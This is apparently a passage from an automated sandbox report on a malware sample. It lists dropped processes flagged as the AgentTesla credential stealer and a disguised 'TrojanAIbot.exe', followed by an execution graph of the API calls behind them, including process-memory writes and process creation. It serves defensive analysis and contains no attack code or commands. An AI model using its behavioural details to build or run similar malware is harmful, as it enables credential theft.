                                                                                                              Start time:09:55:14
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                              Wow64 process (32bit):false
                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                              Imagebase:0x7ff717f30000
                                                                                                              File size:496'640 bytes
                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                              Has elevated privileges:true
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:22
                                                                                                              Start time:09:55:19
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Antivirus matches:
                                                                                                              • Detection: 29%, ReversingLabs
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:24
                                                                                                              Start time:09:55:21
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Imagebase:0x400000
                                                                                                              File size:68'096 bytes
                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:25
                                                                                                              Start time:09:55:22
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                              Imagebase:0x680000
                                                                                                              File size:250'368 bytes
                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B8C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B61000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000019.00000002.2459185652.0000000002B94000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:26
                                                                                                              Start time:09:55:22
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                              Imagebase:0xef0000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:27
                                                                                                              Start time:09:55:28
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\Wisrysxl.PIF
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\Public\Libraries\Wisrysxl.PIF"
                                                                                                              Imagebase:0x400000
                                                                                                              File size:1'081'856 bytes
                                                                                                              MD5 hash:31BC6907D6097A76BB1DD891CFC09B7A
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:Borland Delphi
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:28
                                                                                                              Start time:09:55:29
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:C:\Users\Public\Libraries\lxsyrsiW.pif
                                                                                                              Imagebase:0x400000
                                                                                                              File size:68'096 bytes
                                                                                                              MD5 hash:C116D3604CEAFE7057D77FF27552C215
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:29
                                                                                                              Start time:09:55:30
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\neworigin.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\neworigin.exe"
                                                                                                              Imagebase:0xed0000
                                                                                                              File size:250'368 bytes
                                                                                                              MD5 hash:D6A4CF0966D24C1EA836BA9A899751E5
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Yara matches:
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.00000000032A4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.000000000329C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000001D.00000002.4593833570.0000000003271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                              Has exited:false

                                                                                                              General

                                                                                                              Target ID:30
                                                                                                              Start time:09:55:31
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Local\Temp\server_BTC.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\server_BTC.exe"
                                                                                                              Imagebase:0x930000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              General

                                                                                                              Target ID:32
                                                                                                              Start time:09:55:36
                                                                                                              Start date:12/11/2024
                                                                                                              Path:C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe
                                                                                                              Wow64 process (32bit):true
                                                                                                              Commandline:"C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe"
                                                                                                              Imagebase:0xf50000
                                                                                                              File size:231'936 bytes
                                                                                                              MD5 hash:50D015016F20DA0905FD5B37D7834823
                                                                                                              Has elevated privileges:false
                                                                                                              Has administrator privileges:false
                                                                                                              Programmed in:C, C++ or other language
                                                                                                              Has exited:true

                                                                                                              Disassembly

                                                                                                              Reset < >

                                                                                                                Execution Graph

                                                                                                                Execution Coverage:16.1%
                                                                                                                Dynamic/Decrypted Code Coverage:100%
                                                                                                                Signature Coverage:67.8%
                                                                                                                Total number of Nodes:2000
                                                                                                                Total number of Limit Nodes:25
                                                                                                                execution_graph 32375 2ec4edc 32376 2ec4ee9 32375->32376 32380 2ec4ef0 32375->32380 32381 2ec4c38 32376->32381 32387 2ec4c50 32380->32387 32382 2ec4c4c 32381->32382 32383 2ec4c3c SysAllocStringLen 32381->32383 32382->32380 32383->32382 32384 2ec4c30 32383->32384 32385 2ec4f3c 32384->32385 32386 2ec4f26 SysAllocStringLen 32384->32386 32385->32380 32386->32384 32386->32385 32388 2ec4c5c 32387->32388 32389 2ec4c56 SysFreeString 32387->32389 32389->32388 32390 2ec1c6c 32391 2ec1c7c 32390->32391 32392 2ec1d04 32390->32392 32393 2ec1c89 32391->32393 32394 2ec1cc0 32391->32394 32395 2ec1d0d 32392->32395 32396 2ec1f58 32392->32396 32398 2ec1c94 32393->32398 32438 2ec1724 32393->32438 32397 2ec1724 10 API calls 32394->32397 32400 2ec1d25 32395->32400 32414 2ec1e24 32395->32414 32399 2ec1fec 32396->32399 32402 2ec1fac 32396->32402 32403 2ec1f68 32396->32403 32420 2ec1cd7 32397->32420 32405 2ec1d2c 32400->32405 32406 2ec1d48 32400->32406 32410 2ec1dfc 32400->32410 32407 2ec1fb2 32402->32407 32411 2ec1724 10 API calls 32402->32411 32408 2ec1724 10 API calls 32403->32408 32404 2ec1e7c 32409 2ec1724 10 API calls 32404->32409 32413 2ec1e95 32404->32413 32418 2ec1d9c 32406->32418 32419 2ec1d79 Sleep 32406->32419 32412 2ec1f82 32408->32412 32415 2ec1f2c 32409->32415 32416 2ec1724 10 API calls 32410->32416 32431 2ec1fc1 32411->32431 32430 2ec1a8c 8 API calls 32412->32430 32434 2ec1fa7 32412->32434 32414->32404 32414->32413 32417 2ec1e55 Sleep 32414->32417 32415->32413 32429 2ec1a8c 8 API calls 32415->32429 32426 2ec1e05 32416->32426 32417->32404 32421 2ec1e6f Sleep 32417->32421 32419->32418 32422 2ec1d91 Sleep 32419->32422 32424 2ec1a8c 8 API calls 32420->32424 32427 2ec1cfd 32420->32427 32421->32414 32422->32406 32423 2ec1ca1 32428 2ec1cb9 32423->32428 32462 2ec1a8c 32423->32462 32424->32427 32433 2ec1a8c 8 API calls 32426->32433 32436 2ec1e1d 32426->32436 32432 2ec1f50 32429->32432 32430->32434 32431->32434 32435 2ec1a8c 8 API calls 32431->32435 32433->32436 32437 2ec1fe4 32435->32437 32439 2ec173c 32438->32439 32440 2ec1968 32438->32440 32441 2ec174e 32439->32441 32450 2ec17cb Sleep 32439->32450 32442 2ec1a80 32440->32442 32443 2ec1938 32440->32443 32446 2ec175d 32441->32446 32451 2ec182c 32441->32451 32455 2ec180a Sleep 32441->32455 32444 2ec1a89 32442->32444 32445 2ec1684 VirtualAlloc 32442->32445 32447 2ec1986 32443->32447 32448 2ec1947 Sleep 32443->32448 32444->32423 32449 2ec16af 32445->32449 32456 2ec16bf 32445->32456 32446->32423 32457 2ec15cc VirtualAlloc 32447->32457 32460 2ec19a4 32447->32460 32448->32447 32452 2ec195d Sleep 32448->32452 32479 2ec1644 32449->32479 32450->32441 32454 2ec17e4 Sleep 32450->32454 32461 2ec1838 32451->32461 32485 2ec15cc 32451->32485 32452->32443 32454->32439 32455->32451 32458 2ec1820 Sleep 32455->32458 32456->32423 32457->32460 32458->32441 32460->32423 32461->32423 32463 2ec1b6c 32462->32463 32464 2ec1aa1 32462->32464 32465 2ec16e8 32463->32465 32466 2ec1aa7 32463->32466 32464->32466 32469 2ec1b13 Sleep 32464->32469 32468 2ec1c66 32465->32468 32471 2ec1644 2 API calls 32465->32471 32467 2ec1ab0 32466->32467 32470 2ec1b4b Sleep 32466->32470 32476 2ec1b81 32466->32476 32467->32428 32468->32428 32469->32466 32472 2ec1b2d Sleep 32469->32472 32474 2ec1b61 Sleep 32470->32474 32470->32476 32473 2ec16f5 VirtualFree 32471->32473 32472->32464 32475 2ec170d 32473->32475 32474->32466 32475->32428 32477 2ec1c00 VirtualFree 32476->32477 32478 2ec1ba4 32476->32478 32477->32428 32478->32428 32480 2ec1681 32479->32480 32481 2ec164d 32479->32481 32480->32456 32481->32480 32482 2ec164f Sleep 32481->32482 32483 2ec1664 32482->32483 32483->32480 32484 2ec1668 Sleep 32483->32484 32484->32481 32489 2ec1560 32485->32489 32487 2ec15d4 VirtualAlloc 32488 2ec15eb 32487->32488 32488->32461 32490 2ec1500 32489->32490 32490->32487 32491 2eed2fc 32501 2ec656c 32491->32501 32495 2eed32a 32506 2eec35c timeSetEvent 32495->32506 32497 2eed334 32498 2eed342 GetMessageA 32497->32498 32499 2eed336 TranslateMessage DispatchMessageA 32498->32499 32500 2eed352 32498->32500 32499->32498 32502 2ec6577 32501->32502 32507 2ec4198 32502->32507 32505 2ec42ac SysFreeString SysReAllocStringLen SysAllocStringLen 32505->32495 32506->32497 32508 2ec41de 32507->32508 32509 2ec43e8 32508->32509 32510 2ec4257 32508->32510 32512 2ec4419 32509->32512 32514 2ec442a 32509->32514 32521 2ec4130 32510->32521 32526 2ec435c GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 32512->32526 32517 2ec446f FreeLibrary 32514->32517 32518 2ec4493 32514->32518 32516 2ec4423 32516->32514 32517->32514 32519 2ec449c 32518->32519 32520 2ec44a2 ExitProcess 32518->32520 32519->32520 32522 2ec4140 32521->32522 32523 2ec4173 32521->32523 32522->32523 32524 2ec15cc VirtualAlloc 32522->32524 32527 2ec5868 32522->32527 32523->32505 32524->32522 32526->32516 32528 2ec5878 GetModuleFileNameA 32527->32528 32529 2ec5894 32527->32529 32531 2ec5acc GetModuleFileNameA RegOpenKeyExA 32528->32531 32529->32522 32532 2ec5b4f 32531->32532 32533 2ec5b0f RegOpenKeyExA 32531->32533 32549 2ec5908 12 API calls 32532->32549 32533->32532 32534 2ec5b2d RegOpenKeyExA 32533->32534 32534->32532 32536 2ec5bd8 lstrcpynA GetThreadLocale GetLocaleInfoA 32534->32536 32538 2ec5cf2 32536->32538 32543 2ec5c0f 32536->32543 32537 2ec5b74 RegQueryValueExA 32539 2ec5b94 RegQueryValueExA 32537->32539 32540 2ec5bb2 RegCloseKey 32537->32540 32538->32529 32539->32540 32540->32529 32542 2ec5c1f lstrlenA 32544 2ec5c37 32542->32544 32543->32538 32543->32542 32544->32538 32545 2ec5c5c lstrcpynA LoadLibraryExA 32544->32545 32546 2ec5c84 32544->32546 32545->32546 32546->32538 32547 2ec5c8e lstrcpynA LoadLibraryExA 32546->32547 32547->32538 32548 2ec5cc0 lstrcpynA LoadLibraryExA 32547->32548 32548->32538 32549->32537 32550 2ee7074 33371 2ec4860 32550->33371 33372 2ec4871 33371->33372 33373 2ec48ae 33372->33373 33374 2ec4897 33372->33374 33389 2ec45a0 33373->33389 33380 2ec4bcc 33374->33380 33377 2ec48a4 33378 2ec48df 33377->33378 33394 2ec4530 33377->33394 33381 2ec4bd9 33380->33381 33388 2ec4c09 33380->33388 33382 2ec4c02 33381->33382 33384 2ec4be5 33381->33384 33385 2ec45a0 11 API calls 33382->33385 33400 2ec2c44 11 API calls 33384->33400 33385->33388 33386 2ec4bf3 33386->33377 33401 2ec44dc 33388->33401 33390 2ec45c8 33389->33390 33391 2ec45a4 33389->33391 33390->33377 33414 2ec2c10 33391->33414 33393 2ec45b1 33393->33377 33395 2ec4544 33394->33395 33396 2ec4534 33394->33396 33397 2ec4572 33395->33397 33399 2ec2c2c 11 API calls 33395->33399 33396->33395 33398 2ec45a0 11 API calls 33396->33398 33397->33378 33398->33395 33399->33397 33400->33386 33402 2ec44e2 33401->33402 33404 2ec44fd 33401->33404 33402->33404 33405 2ec2c2c 33402->33405 33404->33386 33406 2ec2c3a 33405->33406 33407 2ec2c30 33405->33407 33406->33404 33407->33406 33408 2ec2d19 33407->33408 33412 2ec6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33407->33412 33413 2ec2ce8 7 API calls 33408->33413 33411 2ec2d3a 33411->33404 33412->33408 33413->33411 33415 2ec2c14 33414->33415 33415->33393 33416 2ec2c1e 33415->33416 33417 2ec2d19 33415->33417 33421 2ec6520 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 33415->33421 33416->33393 33422 2ec2ce8 7 API calls 33417->33422 33420 2ec2d3a 33420->33393 33421->33417 33422->33420 33423 2ee3e12 33424 2ec4860 11 API calls 33423->33424 33425 2ee3e33 33424->33425 33426 2ee3e4b 33425->33426 34969 2ec47ec 33426->34969 33428 2ee3e6a 33429 2ee3e82 33428->33429 34984 2ed89d0 33429->34984 33434 2ec4860 11 API calls 33435 2ee3ee0 33434->33435 33436 2ee3eeb 33435->33436 33437 2ee3ef7 33436->33437 33438 2ec4860 11 API calls 33437->33438 33439 2ee3f18 33438->33439 33440 2ee3f23 33439->33440 33441 2ee3f30 33440->33441 33442 2ec47ec 11 API calls 33441->33442 33443 2ee3f4f 33442->33443 33444 2ee3f67 33443->33444 33445 2ed89d0 20 API calls 33444->33445 33446 2ee3f73 33445->33446 33447 2ec4860 11 API calls 33446->33447 33448 2ee3f94 33447->33448 33449 2ee3f9f 33448->33449 33450 2ee3fac 33449->33450 33451 2ec47ec 11 API calls 33450->33451 33452 2ee3fcb 33451->33452 33453 2ee3fe3 33452->33453 33454 2ed89d0 20 API calls 33453->33454 33455 2ee3fef 33454->33455 33456 2ec4860 11 API calls 33455->33456 33457 2ee4010 33456->33457 33458 2ee401b 33457->33458 33459 2ee4028 33458->33459 33460 2ec47ec 11 API calls 33459->33460 33461 2ee4047 33460->33461 33462 2ee4052 33461->33462 33463 2ee405f 33462->33463 33464 2ed89d0 20 API calls 33463->33464 33465 2ee406b 33464->33465 35004 2ede358 33465->35004 33468 2ee4091 33469 2ee40a2 33468->33469 35009 2eddc8c 33469->35009 33472 2ec4860 11 API calls 33473 2ee40f1 33472->33473 33474 2ee40fc 33473->33474 33475 2ec47ec 11 API calls 33474->33475 33476 2ee4128 33475->33476 33477 2ee4133 33476->33477 33478 2ed89d0 20 API calls 33477->33478 33479 2ee414c 33478->33479 33480 2ec4860 11 API calls 33479->33480 33481 2ee416d 33480->33481 33482 2ec47ec 11 API calls 33481->33482 33483 2ee41a4 33482->33483 33484 2ee41af 33483->33484 33485 2ed89d0 20 API calls 33484->33485 33486 2ee41c8 33485->33486 35024 2ed88b8 LoadLibraryW 33486->35024 33488 2ee41cd 33489 2ee41d7 33488->33489 35029 2ede678 33489->35029 33492 2ec4860 11 API calls 33493 2ee4217 33492->33493 33494 2ee422f 33493->33494 33495 2ec47ec 11 API calls 33494->33495 33496 2ee424e 33495->33496 33497 2ee4259 33496->33497 33498 2ed89d0 20 API calls 33497->33498 33499 2ee4272 Sleep 33498->33499 33500 2ec4860 11 API calls 33499->33500 33501 2ee429d 33500->33501 33502 2ee42b5 33501->33502 33503 2ec47ec 11 API calls 33502->33503 33504 2ee42d4 33503->33504 33505 2ee42df 33504->33505 35168 2ec46d4 33505->35168 34970 2ec47f0 34969->34970 34971 2ec4851 34969->34971 34972 2ec47f8 34970->34972 34973 2ec4530 34970->34973 34972->34971 34974 2ec4807 34972->34974 34976 2ec4530 11 API calls 34972->34976 34977 2ec45a0 11 API calls 34973->34977 34979 2ec4544 34973->34979 34978 2ec45a0 11 API calls 34974->34978 34975 2ec4572 34975->33428 34976->34974 34977->34979 34981 2ec4821 34978->34981 34979->34975 34980 2ec2c2c 11 API calls 34979->34980 34980->34975 34982 2ec4530 11 API calls 34981->34982 34983 2ec484d 34982->34983 34983->33428 34985 2ed89e4 34984->34985 35170 2ed81cc 34985->35170 34987 2ed8a1d 35181 2ed8274 34987->35181 34989 2ed8a36 35192 2ed7d78 34989->35192 34991 2ed8a95 35206 2ed8338 34991->35206 34994 2ed8abc 35218 2ec4500 34994->35218 34997 2edf094 34998 2edf0b9 34997->34998 34999 2edf0e5 34998->34999 35229 2ec46c4 11 API calls 34998->35229 35230 2ec4530 11 API calls 34998->35230 35000 2ec44dc 11 API calls 34999->35000 35002 2edf0fa 35000->35002 35002->33434 35005 2ec4bcc 11 API calls 35004->35005 35006 2ede370 35005->35006 35007 2ede391 35006->35007 35231 2ec49f8 35006->35231 35007->33468 35010 2eddca2 35009->35010 35237 2ec4f20 35010->35237 35012 2eddcaa 35013 2eddcca RtlDosPathNameToNtPathName_U 35012->35013 35241 2eddbdc 35013->35241 35015 2eddce6 NtCreateFile 35016 2eddd11 35015->35016 35017 2ec49f8 11 API calls 35016->35017 35018 2eddd23 NtWriteFile NtClose 35017->35018 35019 2eddd4d 35018->35019 35242 2ec4c60 35019->35242 35022 2ec44dc 11 API calls 35023 2eddd5d Sleep 35022->35023 35023->33472 35025 2ed8274 15 API calls 35024->35025 35026 2ed88f1 35025->35026 35027 2ed7d78 18 API calls 35026->35027 35028 2ed891f FreeLibrary 35027->35028 35028->33488 35030 2ede681 35029->35030 35030->35030 35031 2ec4860 11 API calls 35030->35031 35032 2ede6ca 35031->35032 35033 2ec47ec 11 API calls 35032->35033 35034 2ede6ef 35033->35034 35035 2ed89d0 20 API calls 35034->35035 35036 2ede70a 35035->35036 35037 2ec4860 11 API calls 35036->35037 35038 2ede723 35037->35038 35039 2ec47ec 11 API calls 35038->35039 35040 2ede748 35039->35040 35041 2ed89d0 20 API calls 35040->35041 35042 2ede763 35041->35042 35043 2ec4860 11 API calls 35042->35043 35044 2ede77c 35043->35044 35045 2ec47ec 11 API calls 35044->35045 35046 2ede7a1 35045->35046 35047 2ed89d0 20 API calls 35046->35047 35048 2ede7bc 35047->35048 35049 2ec4860 11 API calls 35048->35049 35050 2ede7ee 35049->35050 35051 2ed89d0 20 API calls 35050->35051 35052 2ede838 35051->35052 35053 2ec4860 11 API calls 35052->35053 35054 2ede86f 35053->35054 35055 2ec47ec 11 API calls 35054->35055 35056 2ede894 35055->35056 35057 2ed89d0 20 API calls 35056->35057 35058 2ede8af 35057->35058 35059 2ec4860 11 API calls 35058->35059 35060 2ede8c8 35059->35060 35061 2ec47ec 11 API calls 35060->35061 35062 2ede8ed 35061->35062 35063 2ed89d0 20 API calls 35062->35063 35064 2ede908 35063->35064 35065 2ec4860 11 API calls 35064->35065 35066 2ede921 35065->35066 35067 2ec47ec 11 API calls 35066->35067 35068 2ede946 35067->35068 35069 2ed89d0 20 API calls 35068->35069 35070 2ede961 35069->35070 35245 2ec7f2c 35070->35245 35072 2ede985 35249 2ed8788 35072->35249 35075 2ec4860 11 API calls 35076 2edea0a 35075->35076 35077 2ec47ec 11 API calls 35076->35077 35078 2edea3b 35077->35078 35079 2ed89d0 20 API calls 35078->35079 35080 2edea5f 35079->35080 35081 2ec4860 11 API calls 35080->35081 35082 2edea7b 35081->35082 35083 2ec47ec 11 API calls 35082->35083 35084 2edeaac 35083->35084 35085 2ed89d0 20 API calls 35084->35085 35086 2edead0 35085->35086 35087 2ec4860 11 API calls 35086->35087 35088 2edeaec 35087->35088 35089 2ec47ec 11 API calls 35088->35089 35090 2edeb1d 35089->35090 35091 2ed89d0 20 API calls 35090->35091 35092 2edeb41 35091->35092 35093 2ec4860 11 API calls 35092->35093 35094 2edeb5d 35093->35094 35095 2ec47ec 11 API calls 35094->35095 35096 2edeb7b 35095->35096 35261 2ed894c LoadLibraryW 35096->35261 35099 2ec4860 11 API calls 35100 2edebac 35099->35100 35101 2ec47ec 11 API calls 35100->35101 35102 2edebca 35101->35102 35103 2ed894c 21 API calls 35102->35103 35104 2edebdf 35103->35104 35105 2ec4860 11 API calls 35104->35105 35106 2edebfb 35105->35106 35107 2ec47ec 11 API calls 35106->35107 35108 2edec19 35107->35108 35109 2ed894c 21 API calls 35108->35109 35110 2edec2e 35109->35110 35111 2ec4860 11 API calls 35110->35111 35112 2edec4a 35111->35112 35113 2ec47ec 11 API calls 35112->35113 35114 2edec68 35113->35114 35115 2ed894c 21 API calls 35114->35115 35116 2edec7d 35115->35116 35117 2edec87 35116->35117 35118 2edeee2 35116->35118 35119 2ec4860 11 API calls 35117->35119 35120 2ec4500 11 API calls 35118->35120 35123 2edeca3 35119->35123 35121 2edeeff 35120->35121 35122 2ec4c60 SysFreeString 35121->35122 35124 2edef0a 35122->35124 35126 2ec47ec 11 API calls 35123->35126 35125 2ec4500 11 API calls 35124->35125 35127 2edef1a 35125->35127 35131 2edecd4 35126->35131 35128 2ec4c60 SysFreeString 35127->35128 35129 2edef22 35128->35129 35130 2ec4500 11 API calls 35129->35130 35132 2edef2f 35130->35132 35133 2ed89d0 20 API calls 35131->35133 35132->33492 35134 2edecf8 35133->35134 35135 2ec4860 11 API calls 35134->35135 35136 2eded14 35135->35136 35137 2ec47ec 11 API calls 35136->35137 35138 2eded45 35137->35138 35139 2ed89d0 20 API calls 35138->35139 35140 2eded69 WaitForSingleObject CloseHandle CloseHandle 35139->35140 35141 2ec4860 11 API calls 35140->35141 35142 2ededa0 35141->35142 35143 2ec47ec 11 API calls 35142->35143 35144 2ededbe 35143->35144 35145 2ed894c 21 API calls 35144->35145 35146 2ededd3 35145->35146 35147 2ec4860 11 API calls 35146->35147 35148 2ededef 35147->35148 35149 2ec47ec 11 API calls 35148->35149 35150 2edee0d 35149->35150 35151 2ed894c 21 API calls 35150->35151 35152 2edee22 35151->35152 35153 2ec4860 11 API calls 35152->35153 35154 2edee3e 35153->35154 35155 2ec47ec 11 API calls 35154->35155 35156 2edee5c 35155->35156 35157 2ed894c 21 API calls 35156->35157 35158 2edee71 35157->35158 35159 2ec4860 11 API calls 35158->35159 35160 2edee8d 35159->35160 35161 2ec47ec 11 API calls 35160->35161 35162 2edeeab 35161->35162 35163 2ed894c 21 API calls 35162->35163 35164 2edeec0 35163->35164 35165 2ed894c 21 API calls 35164->35165 35166 2edeed1 35165->35166 35167 2ed894c 21 API calls 35166->35167 35167->35118 35169 2ec46da 35168->35169 35171 2ec4530 11 API calls 35170->35171 35172 2ed81ef 35171->35172 35222 2ed798c 35172->35222 35174 2ed81fc 35175 2ed8204 GetModuleHandleA 35174->35175 35176 2ed8274 15 API calls 35175->35176 35177 2ed8215 GetModuleHandleA 35176->35177 35178 2ed8233 35177->35178 35179 2ec44dc 11 API calls 35178->35179 35180 2ed823b 35179->35180 35180->34987 35182 2ec4530 11 API calls 35181->35182 35183 2ed8299 35182->35183 35184 2ed798c 12 API calls 35183->35184 35185 2ed82a6 35184->35185 35186 2ec47ec 11 API calls 35185->35186 35187 2ed82b3 35186->35187 35188 2ed82bb GetModuleHandleW GetProcAddress GetProcAddress 35187->35188 35189 2ed82ee 35188->35189 35190 2ec4500 11 API calls 35189->35190 35191 2ed82fb 35190->35191 35191->34989 35193 2ec4530 11 API calls 35192->35193 35194 2ed7d9d 35193->35194 35195 2ed798c 12 API calls 35194->35195 35196 2ed7daa 35195->35196 35197 2ec47ec 11 API calls 35196->35197 35198 2ed7dba 35197->35198 35199 2ed81cc 17 API calls 35198->35199 35200 2ed7dcd 35199->35200 35201 2ed8274 15 API calls 35200->35201 35202 2ed7dd3 NtWriteVirtualMemory 35201->35202 35203 2ed7dff 35202->35203 35204 2ec4500 11 API calls 35203->35204 35205 2ed7e0c 35204->35205 35205->34991 35207 2ec4530 11 API calls 35206->35207 35208 2ed835b 35207->35208 35209 2ec4860 11 API calls 35208->35209 35210 2ed837a 35209->35210 35211 2ed81cc 17 API calls 35210->35211 35212 2ed838d 35211->35212 35213 2ed8274 15 API calls 35212->35213 35214 2ed8393 FlushInstructionCache 35213->35214 35215 2ed83b9 35214->35215 35216 2ec44dc 11 API calls 35215->35216 35217 2ed83c1 FreeLibrary 35216->35217 35217->34994 35220 2ec4506 35218->35220 35219 2ec452c 35219->34997 35220->35219 35221 2ec2c2c 11 API calls 35220->35221 35221->35220 35223 2ed799d 35222->35223 35224 2ec4bcc 11 API calls 35223->35224 35226 2ed79ad 35224->35226 35225 2ed7a19 35225->35174 35226->35225 35228 2ecbabc CharNextA 35226->35228 35228->35226 35229->34998 35230->34998 35232 2ec49ac 35231->35232 35233 2ec49e7 35232->35233 35234 2ec45a0 11 API calls 35232->35234 35233->35006 35235 2ec49c3 35234->35235 35235->35233 35236 2ec2c2c 11 API calls 35235->35236 35236->35233 35238 2ec4f3c 35237->35238 35239 2ec4f26 SysAllocStringLen 35237->35239 35238->35012 35239->35238 35240 2ec4c30 35239->35240 35240->35237 35241->35015 35243 2ec4c74 35242->35243 35244 2ec4c66 SysFreeString 35242->35244 35243->35022 35244->35243 35246 2ec7f3f 35245->35246 35268 2ec4a00 35246->35268 35250 2ec4530 11 API calls 35249->35250 35251 2ed87ab 35250->35251 35252 2ec4860 11 API calls 35251->35252 35253 2ed87ca 35252->35253 35254 2ed81cc 17 API calls 35253->35254 35255 2ed87dd 35254->35255 35256 2ed8274 15 API calls 35255->35256 35257 2ed87e3 CreateProcessAsUserW 35256->35257 35258 2ed8827 35257->35258 35259 2ec44dc 11 API calls 35258->35259 35260 2ed882f 35259->35260 35260->35075 35262 2ed89bb 35261->35262 35263 2ed8973 GetProcAddress 35261->35263 35262->35099 35264 2ed898d 35263->35264 35265 2ed89b0 FreeLibrary 35263->35265 35266 2ed7d78 18 API calls 35264->35266 35265->35262 35267 2ed89a5 35266->35267 35267->35265 35269 2ec4a05 35268->35269 35270 2ec4a32 35268->35270 35269->35270 35273 2ec4a19 35269->35273 35271 2ec44dc 11 API calls 35270->35271 35272 2ec4a28 35271->35272 35272->35072 35275 2ec45cc 35273->35275 35276 2ec45a0 11 API calls 35275->35276 35277 2ec45dc 35276->35277 35278 2ec44dc 11 API calls 35277->35278 35279 2ec45f4 35278->35279 35279->35272 35280 2eec350 35283 2edf7c8 35280->35283 35282 2eec358 35284 2edf7d0 35283->35284 35284->35284 35285 2edf7d7 35284->35285 35286 2ed88b8 20 API calls 35285->35286 35287 2edf7f1 35286->35287 37702 2ec2ee0 QueryPerformanceCounter 35287->37702 35289 2edf7f6 35290 2edf800 InetIsOffline 35289->35290 35291 